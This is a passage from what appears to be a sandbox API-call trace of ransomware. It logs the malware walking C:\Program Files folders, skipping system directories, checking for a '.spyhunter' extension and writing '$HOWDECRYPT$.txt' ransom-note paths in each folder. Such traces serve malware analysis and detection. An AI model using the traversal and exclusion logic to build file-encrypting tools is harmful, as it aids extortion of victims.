Maker\\Shared\\DvdStyles\\Vignette\\softedges.png") returned 70 [0095.268] StrStrIW (lpFirst="softedges.png", lpSrch=".spyhunter") returned 0x0 [0095.268] lstrcmpW (lpString1="softedges.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.268] lstrcmpW (lpString1="softedges.png", lpString2="_uninstalling_.png") returned 1 [0095.268] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png") returned 70 [0095.268] GetProcessHeap () returned 0x2c0000 [0095.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e7e8 [0095.268] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1480) returned 0x2c310e0 [0095.268] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.268] lstrcmpiW (lpString1="vignettemask25.png", lpString2="Windows") returned -1 [0095.268] lstrlenW (lpString="Windows") returned 7 [0095.268] lstrcmpiW (lpString1="vignettemask25.png", lpString2="$Recycle.bin") returned 1 [0095.268] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.268] lstrcmpiW (lpString1="vignettemask25.png", lpString2="System Volume Information") returned 1 [0095.268] lstrlenW (lpString="System Volume Information") returned 25 [0095.268] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png") returned 75 [0095.268] StrStrIW (lpFirst="vignettemask25.png", lpSrch=".spyhunter") returned 0x0 [0095.268] lstrcmpW (lpString1="vignettemask25.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.269] lstrcmpW (lpString1="vignettemask25.png", lpString2="_uninstalling_.png") returned 1 [0095.269] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png") returned 75 [0095.269] GetProcessHeap () returned 0x2c0000 [0095.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346aa8 [0095.269] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1488) returned 0x2c310e0 [0095.269] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.269] lstrcmpiW (lpString1="whiteband.png", lpString2="Windows") returned -1 [0095.269] lstrlenW (lpString="Windows") returned 7 [0095.269] lstrcmpiW (lpString1="whiteband.png", lpString2="$Recycle.bin") returned 1 [0095.269] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.269] lstrcmpiW (lpString1="whiteband.png", lpString2="System Volume Information") returned 1 [0095.269] lstrlenW (lpString="System Volume Information") returned 25 [0095.269] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png") returned 70 [0095.269] StrStrIW (lpFirst="whiteband.png", lpSrch=".spyhunter") returned 0x0 [0095.269] lstrcmpW (lpString1="whiteband.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.269] lstrcmpW (lpString1="whiteband.png", lpString2="_uninstalling_.png") returned 1 [0095.269] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png") returned 70 [0095.269] GetProcessHeap () returned 0x2c0000 [0095.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e638 [0095.269] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1490) returned 0x2c310e0 [0095.269] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0095.269] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0095.273] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\$HOWDECRYPT$.txt") returned 73 [0095.273] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\$HOWDECRYPT$.txt") returned 73 [0095.273] GetProcessHeap () returned 0x2c0000 [0095.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346b88 [0095.273] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1498) returned 0x2c310e0 [0095.273] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0095.273] lstrcmpiW (lpString1="WhiteDot.png", lpString2="Windows") returned -1 [0095.273] lstrlenW (lpString="Windows") returned 7 [0095.273] lstrcmpiW (lpString1="WhiteDot.png", lpString2="$Recycle.bin") returned 1 [0095.273] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.273] lstrcmpiW (lpString1="WhiteDot.png", lpString2="System Volume Information") returned 1 [0095.273] lstrlenW (lpString="System Volume Information") returned 25 [0095.273] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png") returned 60 [0095.273] StrStrIW (lpFirst="WhiteDot.png", lpSrch=".spyhunter") returned 0x0 [0095.273] lstrcmpW (lpString1="WhiteDot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.273] lstrcmpW (lpString1="WhiteDot.png", lpString2="_uninstalling_.png") returned 1 [0095.273] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png") returned 60 [0095.273] GetProcessHeap () returned 0x2c0000 [0095.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d8d8 [0095.273] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14a0) returned 0x2c310e0 [0095.273] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0095.274] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0095.274] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\$HOWDECRYPT$.txt") returned 64 [0095.274] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\$HOWDECRYPT$.txt") returned 64 [0095.274] GetProcessHeap () returned 0x2c0000 [0095.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x358060 [0095.274] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14a8) returned 0x2c310e0 [0095.279] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.279] lstrcmpiW (lpString1="Filters.xml", lpString2="Windows") returned -1 [0095.279] lstrlenW (lpString="Windows") returned 7 [0095.279] lstrcmpiW (lpString1="Filters.xml", lpString2="$Recycle.bin") returned 1 [0095.279] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.279] lstrcmpiW (lpString1="Filters.xml", lpString2="System Volume Information") returned -1 [0095.279] lstrlenW (lpString="System Volume Information") returned 25 [0095.279] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned 49 [0095.279] StrStrIW (lpFirst="Filters.xml", lpSrch=".spyhunter") returned 0x0 [0095.279] lstrcmpW (lpString1="Filters.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.279] lstrcmpW (lpString1="Filters.xml", lpString2="_uninstalling_.png") returned 1 [0095.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned 49 [0095.279] GetProcessHeap () returned 0x2c0000 [0095.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa4) returned 0x33d0b0 [0095.280] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b0) returned 0x2c310e0 [0095.280] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.280] lstrcmpiW (lpString1="Parity.fx", lpString2="Windows") returned -1 [0095.280] lstrlenW (lpString="Windows") returned 7 [0095.280] lstrcmpiW (lpString1="Parity.fx", lpString2="$Recycle.bin") returned 1 [0095.280] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.280] lstrcmpiW (lpString1="Parity.fx", lpString2="System Volume Information") returned -1 [0095.280] lstrlenW (lpString="System Volume Information") returned 25 [0095.280] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned 47 [0095.280] StrStrIW (lpFirst="Parity.fx", lpSrch=".spyhunter") returned 0x0 [0095.280] lstrcmpW (lpString1="Parity.fx", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.280] lstrcmpW (lpString1="Parity.fx", lpString2="_uninstalling_.png") returned 1 [0095.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned 47 [0095.280] GetProcessHeap () returned 0x2c0000 [0095.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa0) returned 0x330de8 [0095.280] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b8) returned 0x2c310e0 [0095.280] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0095.280] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0095.281] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\$HOWDECRYPT$.txt") returned 54 [0095.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\$HOWDECRYPT$.txt") returned 54 [0095.281] GetProcessHeap () returned 0x2c0000 [0095.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xae) returned 0x329dd8 [0095.281] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c0) returned 0x2c310e0 [0095.281] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.281] lstrcmpiW (lpString1="soniccolorconverter.ax", lpString2="Windows") returned -1 [0095.281] lstrlenW (lpString="Windows") returned 7 [0095.281] lstrcmpiW (lpString1="soniccolorconverter.ax", lpString2="$Recycle.bin") returned 1 [0095.281] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.281] lstrcmpiW (lpString1="soniccolorconverter.ax", lpString2="System Volume Information") returned -1 [0095.281] lstrlenW (lpString="System Volume Information") returned 25 [0095.281] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned 53 [0095.281] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".spyhunter") returned 0x0 [0095.281] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.281] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="_uninstalling_.png") returned 1 [0095.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned 53 [0095.281] GetProcessHeap () returned 0x2c0000 [0095.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x329f48 [0095.281] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0095.281] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.281] lstrcmpiW (lpString1="sonicsptransform.ax", lpString2="Windows") returned -1 [0095.281] lstrlenW (lpString="Windows") returned 7 [0095.282] lstrcmpiW (lpString1="sonicsptransform.ax", lpString2="$Recycle.bin") returned 1 [0095.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.282] lstrcmpiW (lpString1="sonicsptransform.ax", lpString2="System Volume Information") returned -1 [0095.282] lstrlenW (lpString="System Volume Information") returned 25 [0095.282] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax") returned 50 [0095.282] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".spyhunter") returned 0x0 [0095.282] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.282] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="_uninstalling_.png") returned 1 [0095.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax") returned 50 [0095.282] GetProcessHeap () returned 0x2c0000 [0095.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa6) returned 0x33d000 [0095.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0095.283] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.283] lstrcmpiW (lpString1="WMM2CLIP.dll", lpString2="Windows") returned 1 [0095.283] lstrlenW (lpString="Windows") returned 7 [0095.283] lstrcmpiW (lpString1="WMM2CLIP.dll", lpString2="$Recycle.bin") returned 1 [0095.283] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.283] lstrcmpiW (lpString1="WMM2CLIP.dll", lpString2="System Volume Information") returned 1 [0095.283] lstrlenW (lpString="System Volume Information") returned 25 [0095.283] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll") returned 43 [0095.283] StrStrIW (lpFirst="WMM2CLIP.dll", lpSrch=".spyhunter") returned 0x0 [0095.283] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.283] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="_uninstalling_.png") returned 1 [0095.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll") returned 43 [0095.283] GetProcessHeap () returned 0x2c0000 [0095.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x351188 [0095.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0095.283] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0095.283] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0095.283] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\$HOWDECRYPT$.txt") returned 47 [0095.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\$HOWDECRYPT$.txt") returned 47 [0095.283] GetProcessHeap () returned 0x2c0000 [0095.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa0) returned 0x330d40 [0095.284] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0095.284] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0095.284] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0095.284] lstrlenW (lpString="Windows") returned 7 [0095.284] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0095.284] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.284] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0095.284] lstrlenW (lpString="System Volume Information") returned 25 [0095.285] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer") returned 38 [0095.285] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0095.285] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0095.285] GetProcessHeap () returned 0x2c0000 [0095.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0095.285] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\*") returned 40 [0095.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x335ee0 [0095.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.286] lstrlenW (lpString="Windows") returned 7 [0095.286] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.286] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.286] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.286] lstrlenW (lpString="System Volume Information") returned 25 [0095.286] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\.") returned 40 [0095.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.286] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.286] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.286] lstrlenW (lpString="Windows") returned 7 [0095.286] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.286] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.286] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.286] lstrlenW (lpString="System Volume Information") returned 25 [0095.286] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\..") returned 41 [0095.286] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.286] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.286] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.286] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0095.286] lstrlenW (lpString="Windows") returned 7 [0095.286] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0095.286] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.286] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0095.286] lstrlenW (lpString="System Volume Information") returned 25 [0095.286] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US") returned 44 [0095.287] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0095.287] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0095.287] GetProcessHeap () returned 0x2c0000 [0095.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0095.287] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*") returned 46 [0095.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0095.288] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.288] lstrlenW (lpString="Windows") returned 7 [0095.288] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.288] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.288] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.288] lstrlenW (lpString="System Volume Information") returned 25 [0095.288] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\.") returned 46 [0095.288] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.288] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.289] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.289] lstrlenW (lpString="Windows") returned 7 [0095.289] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.289] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.289] lstrlenW (lpString="System Volume Information") returned 25 [0095.289] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\..") returned 47 [0095.289] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.289] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.289] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="Windows") returned -1 [0095.289] lstrlenW (lpString="Windows") returned 7 [0095.289] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="$Recycle.bin") returned 1 [0095.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.289] lstrcmpiW (lpString1="hmmapi.dll.mui", lpString2="System Volume Information") returned -1 [0095.289] lstrlenW (lpString="System Volume Information") returned 25 [0095.289] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 59 [0095.289] StrStrIW (lpFirst="hmmapi.dll.mui", lpSrch=".spyhunter") returned 0x0 [0095.289] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.289] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="_uninstalling_.png") returned 1 [0095.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 59 [0095.289] GetProcessHeap () returned 0x2c0000 [0095.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34d058 [0095.289] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0095.289] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.290] lstrcmpiW (lpString1="iedvtool.dll.mui", lpString2="Windows") returned -1 [0095.290] lstrlenW (lpString="Windows") returned 7 [0095.290] lstrcmpiW (lpString1="iedvtool.dll.mui", lpString2="$Recycle.bin") returned 1 [0095.290] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.290] lstrcmpiW (lpString1="iedvtool.dll.mui", lpString2="System Volume Information") returned -1 [0095.290] lstrlenW (lpString="System Volume Information") returned 25 [0095.290] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned 61 [0095.290] StrStrIW (lpFirst="iedvtool.dll.mui", lpSrch=".spyhunter") returned 0x0 [0095.290] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.290] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2="_uninstalling_.png") returned 1 [0095.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned 61 [0095.290] GetProcessHeap () returned 0x2c0000 [0095.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32d5b8 [0095.290] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0095.290] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.290] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="Windows") returned -1 [0095.290] lstrlenW (lpString="Windows") returned 7 [0095.290] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="$Recycle.bin") returned 1 [0095.290] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.290] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="System Volume Information") returned -1 [0095.290] lstrlenW (lpString="System Volume Information") returned 25 [0095.290] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 61 [0095.290] StrStrIW (lpFirst="ieinstal.exe.mui", lpSrch=".spyhunter") returned 0x0 [0095.290] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.291] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="_uninstalling_.png") returned 1 [0095.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 61 [0095.291] GetProcessHeap () returned 0x2c0000 [0095.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32d748 [0095.291] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0095.291] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.291] lstrcmpiW (lpString1="ielowutil.exe.mui", lpString2="Windows") returned -1 [0095.291] lstrlenW (lpString="Windows") returned 7 [0095.291] lstrcmpiW (lpString1="ielowutil.exe.mui", lpString2="$Recycle.bin") returned 1 [0095.291] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.291] lstrcmpiW (lpString1="ielowutil.exe.mui", lpString2="System Volume Information") returned -1 [0095.291] lstrlenW (lpString="System Volume Information") returned 25 [0095.291] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned 62 [0095.291] StrStrIW (lpFirst="ielowutil.exe.mui", lpSrch=".spyhunter") returned 0x0 [0095.291] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.291] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="_uninstalling_.png") returned 1 [0095.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned 62 [0095.291] GetProcessHeap () returned 0x2c0000 [0095.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbe) returned 0x32d680 [0095.291] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0095.291] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.291] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="Windows") returned -1 [0095.291] lstrlenW (lpString="Windows") returned 7 [0095.291] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="$Recycle.bin") returned 1 [0095.291] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.292] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="System Volume Information") returned -1 [0095.292] lstrlenW (lpString="System Volume Information") returned 25 [0095.292] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 61 [0095.292] StrStrIW (lpFirst="iexplore.exe.mui", lpSrch=".spyhunter") returned 0x0 [0095.292] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.292] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="_uninstalling_.png") returned 1 [0095.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 61 [0095.292] GetProcessHeap () returned 0x2c0000 [0095.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32d4f0 [0095.292] RtlReAllocateHeap 